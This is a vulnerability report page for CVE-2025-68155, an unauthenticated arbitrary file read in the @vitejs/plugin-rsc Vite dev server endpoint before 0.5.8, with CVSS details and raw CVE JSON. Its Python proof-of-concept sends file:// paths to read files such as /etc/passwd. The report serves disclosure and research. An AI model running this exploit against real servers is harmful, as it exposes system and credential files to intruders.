Security Vulnerability Report
中文
CVE-2025-68155 CVSS 7.5 HIGH

CVE-2025-68155

Published: 2025-12-16 19:16:00
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

@vitejs/plugin-rs provides React Server Components (RSC) support for Vite. Prior to version 0.5.8, the `/__vite_rsc_findSourceMapURL` endpoint in `@vitejs/plugin-rsc` allows unauthenticated arbitrary file read during development mode. An attacker can read any file accessible to the Node.js process by sending a crafted HTTP request with a `file://` URL in the `filename` query parameter. Version 0.5.8 fixes the issue.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

@vitejs/plugin-rsc < 0.5.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-68155 PoC - Arbitrary File Read in @vitejs/plugin-rsc # Target: Vite dev server running @vitejs/plugin-rsc < 0.5.8 def exploit_cve_2025_68155(target_url, file_path): """ Exploit arbitrary file read via /__vite_rsc_findSourceMapURL endpoint Args: target_url: Base URL of vulnerable Vite dev server file_path: Absolute path of file to read (e.g., /etc/passwd) """ endpoint = f"{target_url.rstrip('/')}/__vite_rsc_findSourceMapURL" # Construct file:// URL to bypass path validation params = { 'filename': f'file://{file_path}' } print(f"[*] Target: {endpoint}") print(f"[*] Attempting to read: {file_path}") try: response = requests.get(endpoint, params=params, timeout=10) if response.status_code == 200: print(f"[+] Success! File contents:") print(response.text) return response.text else: print(f"[-] Failed with status code: {response.status_code}") return None except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return None if __name__ == "__main__": # Example usage target = "http://localhost:5173" file_to_read = "/etc/passwd" exploit_cve_2025_68155(target, file_to_read)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68155", "sourceIdentifier": "[email protected]", "published": "2025-12-16T19:16:00.410", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "@vitejs/plugin-rs provides React Server Components (RSC) support for Vite. Prior to version 0.5.8, the `/__vite_rsc_findSourceMapURL` endpoint in `@vitejs/plugin-rsc` allows unauthenticated arbitrary file read during development mode. An attacker can read any file accessible to the Node.js process by sending a crafted HTTP request with a `file://` URL in the `filename` query parameter. Version 0.5.8 fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-73"}]}], "references": [{"url": "https://github.com/facebook/react/pull/29708", "source": "[email protected]"}, {"url": "https://github.com/facebook/react/pull/30741", "source": "[email protected]"}, {"url": "https://github.com/vitejs/vite-plugin-react/commit/582fba0b9a52b13fcff6beaaa3bfbd532bc5359d", "source": "[email protected]"}, {"url": "https://github.com/vitejs/vite-plugin-react/security/advisories/GHSA-g239-q96q-x4qm", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.